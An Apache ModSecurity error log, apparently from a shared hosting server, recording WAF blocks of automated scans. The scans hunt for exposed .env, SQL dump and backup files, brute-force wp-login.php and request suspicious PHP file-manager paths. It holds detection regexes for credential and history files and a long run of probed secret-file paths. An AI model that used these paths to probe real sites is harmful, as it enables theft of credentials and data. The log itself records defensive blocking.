[Tue May 26 19:49:24.064911 2026] [security2:error] [pid 77894:tid 78064] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/redmine/.env"] [unique_id "ahWr7DomEhVPuJoD1MaDpwAAACg"]
[Tue May 26 19:49:24.224670 2026] [security2:error] [pid 77894:tid 78099] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/helpdesk/.env"] [unique_id "ahWr7DomEhVPuJoD1MaDqQAAAEs"]
[Tue May 26 19:49:24.384707 2026] [security2:error] [pid 77894:tid 78072] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/src/dump.sql"] [unique_id "ahWr7DomEhVPuJoD1MaDuQAAADA"]
[Tue May 26 19:49:24.545071 2026] [security2:error] [pid 77894:tid 78116] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/core/app/.env"] [unique_id "ahWr7DomEhVPuJoD1MaDvgAAAFw"]
[Tue May 26 19:49:24.706003 2026] [security2:error] [pid 77894:tid 78151] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/laravel/database/.env"] [unique_id "ahWr7DomEhVPuJoD1MaDwQAAAH8"]
[Tue May 26 19:49:24.866899 2026] [security2:error] [pid 77894:tid 78085] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/env.backup"] [unique_id "ahWr7DomEhVPuJoD1MaDxQAAAD0"]
[Tue May 26 19:49:24.991133 2026] [security2:error] [pid 77894:tid 78070] [client 172.71.172.205:10257] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blettclms.com"] [uri "/index.php/wp-admin/install.php"] [unique_id "ahWr7DomEhVPuJoD1MaDrwAALk4"]
[Tue May 26 19:49:25.839072 2026] [security2:error] [pid 77894:tid 78128] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/data/readme.bak"] [unique_id "ahWr7TomEhVPuJoD1MaD4wAAAGg"]
[Tue May 26 19:49:25.998995 2026] [security2:error] [pid 77894:tid 78105] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/services/simcore/.env"] [unique_id "ahWr7TomEhVPuJoD1MaD6gAAAFE"]
[Tue May 26 19:49:26.146777 2026] [security2:error] [pid 77894:tid 77971] [remote 65.2.90.30:53798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWr7TomEhVPuJoD1MaD5AAAWkw"]
[Tue May 26 19:49:26.439770 2026] [security2:error] [pid 77894:tid 78027] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr7jomEhVPuJoD1MaD6wAAAAM"]
[Tue May 26 19:49:26.970066 2026] [security2:error] [pid 77894:tid 78131] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/db~"] [unique_id "ahWr7jomEhVPuJoD1MaECAAAAGs"]
[Tue May 26 19:49:27.130298 2026] [security2:error] [pid 77894:tid 78140] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/mailer/.env"] [unique_id "ahWr7zomEhVPuJoD1MaEFgAAAHQ"]
[Tue May 26 19:49:27.290404 2026] [security2:error] [pid 77894:tid 78123] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/grav/.env"] [unique_id "ahWr7zomEhVPuJoD1MaEHQAAAGM"]
[Tue May 26 19:49:27.450883 2026] [security2:error] [pid 77894:tid 78056] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/storage/app/public/.env"] [unique_id "ahWr7zomEhVPuJoD1MaEHgAAACA"]
[Tue May 26 19:49:28.097749 2026] [security2:error] [pid 77894:tid 78053] [client 185.177.72.53:49702] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.swp.backup"] [unique_id "ahWr8DomEhVPuJoD1MaENAAAAB0"]
[Tue May 26 19:49:28.303772 2026] [security2:error] [pid 77894:tid 78036] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr7zomEhVPuJoD1MaELwAAAAw"]
[Tue May 26 19:49:28.442032 2026] [security2:error] [pid 77894:tid 78097] [client 47.128.46.98:50824] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/debats-cicodev"] [unique_id "ahWr8DomEhVPuJoD1MaERAAAAEk"]
[Tue May 26 19:49:29.877342 2026] [security2:error] [pid 77894:tid 78110] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backend/database/.env"] [unique_id "ahWr8TomEhVPuJoD1MaEcgAAAFY"]
[Tue May 26 19:49:30.006333 2026] [security2:error] [pid 77894:tid 77959] [remote 173.212.245.56:57080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWr8TomEhVPuJoD1MaEbQAAMUA"]
[Tue May 26 19:49:30.199467 2026] [security2:error] [pid 77894:tid 78030] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/elasticsearch/.env"] [unique_id "ahWr8jomEhVPuJoD1MaEeQAAAAY"]
[Tue May 26 19:49:30.718378 2026] [security2:error] [pid 77894:tid 78126] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr8jomEhVPuJoD1MaEhQAAAGY"]
[Tue May 26 19:49:31.171509 2026] [security2:error] [pid 77894:tid 78104] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/updates/.env"] [unique_id "ahWr8zomEhVPuJoD1MaEpQAAAFA"]
[Tue May 26 19:49:31.818851 2026] [security2:error] [pid 77894:tid 78109] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/upload/users.bak"] [unique_id "ahWr8zomEhVPuJoD1MaEuAAAAFU"]
[Tue May 26 19:49:31.952312 2026] [security2:error] [pid 77894:tid 77986] [remote 173.212.245.56:57080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWr8zomEhVPuJoD1MaEvwAANFs"], referer: https://yndglobal.com/wp-login.php
[Tue May 26 19:49:32.302961 2026] [security2:error] [pid 77894:tid 78146] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/dashboard-app/frontend/.env"] [unique_id "ahWr9DomEhVPuJoD1MaEzgAAAHo"]
[Tue May 26 19:49:32.484275 2026] [security2:error] [pid 77894:tid 78085] [client 172.225.77.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWr9DomEhVPuJoD1MaEzQAAAD0"]
[Tue May 26 19:49:32.789033 2026] [security2:error] [pid 77894:tid 78046] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/backup/index.sql"] [unique_id "ahWr9DomEhVPuJoD1MaE5AAAABY"]
[Tue May 26 19:49:33.229205 2026] [security2:error] [pid 77894:tid 78029] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr9DomEhVPuJoD1MaE5wAAAAU"]
[Tue May 26 19:49:33.276323 2026] [security2:error] [pid 77894:tid 78107] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sql/export.sql"] [unique_id "ahWr9TomEhVPuJoD1MaE9AAAAFM"]
[Tue May 26 19:49:33.925082 2026] [security2:error] [pid 77894:tid 78110] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ajax.php.orig"] [unique_id "ahWr9TomEhVPuJoD1MaFGQAAAFY"]
[Tue May 26 19:49:35.059229 2026] [security2:error] [pid 77894:tid 78075] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/hash.php.old"] [unique_id "ahWr9zomEhVPuJoD1MaFRAAAADM"]
[Tue May 26 19:49:35.544562 2026] [security2:error] [pid 77894:tid 78116] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/films/.env"] [unique_id "ahWr9zomEhVPuJoD1MaFVwAAAFw"]
[Tue May 26 19:49:36.030372 2026] [security2:error] [pid 77894:tid 78056] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/twitter-bot/.env"] [unique_id "ahWr-DomEhVPuJoD1MaFYwAAACA"]
[Tue May 26 19:49:36.317203 2026] [security2:error] [pid 77894:tid 78022] [remote 45.236.128.46:60282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.128.236.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWr-DomEhVPuJoD1MaFZgAANn8"]
[Tue May 26 19:49:36.355363 2026] [security2:error] [pid 77894:tid 78107] [client 185.177.72.53:32766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/backup/users.sql"] [unique_id "ahWr-DomEhVPuJoD1MaFbAAAAFM"]
[Tue May 26 19:49:36.578582 2026] [security2:error] [pid 77894:tid 78101] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr-DomEhVPuJoD1MaFZwAAAE0"]
[Tue May 26 19:49:37.119311 2026] [security2:error] [pid 77894:tid 78077] [client 4.197.75.18:3277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWr-TomEhVPuJoD1MaFiQAAADU"]
[Tue May 26 19:49:37.119460 2026] [security2:error] [pid 77894:tid 78077] [client 4.197.75.18:3277] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWr-TomEhVPuJoD1MaFiQAAADU"]
[Tue May 26 19:49:37.779649 2026] [security2:error] [pid 77894:tid 78136] [client 113.167.192.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr-TomEhVPuJoD1MaFlwAAAHA"]
[Tue May 26 19:49:37.905897 2026] [http2:info] [pid 86490:tid 86490] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:49:38.195850 2026] [security2:error] [pid 86490:tid 86631] [client 4.197.75.18:3287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahWr-lZMwN0DpLVWo6KGLQAAAJA"]
[Tue May 26 19:49:38.195978 2026] [security2:error] [pid 86490:tid 86631] [client 4.197.75.18:3287] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahWr-lZMwN0DpLVWo6KGLQAAAJA"]
[Tue May 26 19:49:38.933640 2026] [security2:error] [pid 86490:tid 86653] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWr-lZMwN0DpLVWo6KGPgAAAKY"]
[Tue May 26 19:49:38.948288 2026] [security2:error] [pid 86490:tid 86673] [client 4.197.75.18:3316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWr-lZMwN0DpLVWo6KGSQAAALo"]
[Tue May 26 19:49:38.948390 2026] [security2:error] [pid 86490:tid 86673] [client 4.197.75.18:3316] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWr-lZMwN0DpLVWo6KGSQAAALo"]
[Tue May 26 19:49:40.241395 2026] [security2:error] [pid 86490:tid 86731] [client 4.197.75.18:3298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahWr_FZMwN0DpLVWo6KGaQAAAPQ"]
[Tue May 26 19:49:40.241514 2026] [security2:error] [pid 86490:tid 86731] [client 4.197.75.18:3298] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahWr_FZMwN0DpLVWo6KGaQAAAPQ"]
[Tue May 26 19:49:40.269576 2026] [security2:error] [pid 86490:tid 86496] [remote 160.250.186.220:54978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWr_FZMwN0DpLVWo6KGZQAAlQU"]
[Tue May 26 19:49:41.298988 2026] [security2:error] [pid 86490:tid 86670] [client 4.197.75.18:3272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.75.197.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWr_VZMwN0DpLVWo6KGiwAAALc"]
[Tue May 26 19:49:41.299115 2026] [security2:error] [pid 86490:tid 86670] [client 4.197.75.18:3272] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcemachinelearning.co.in.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWr_VZMwN0DpLVWo6KGiwAAALc"]
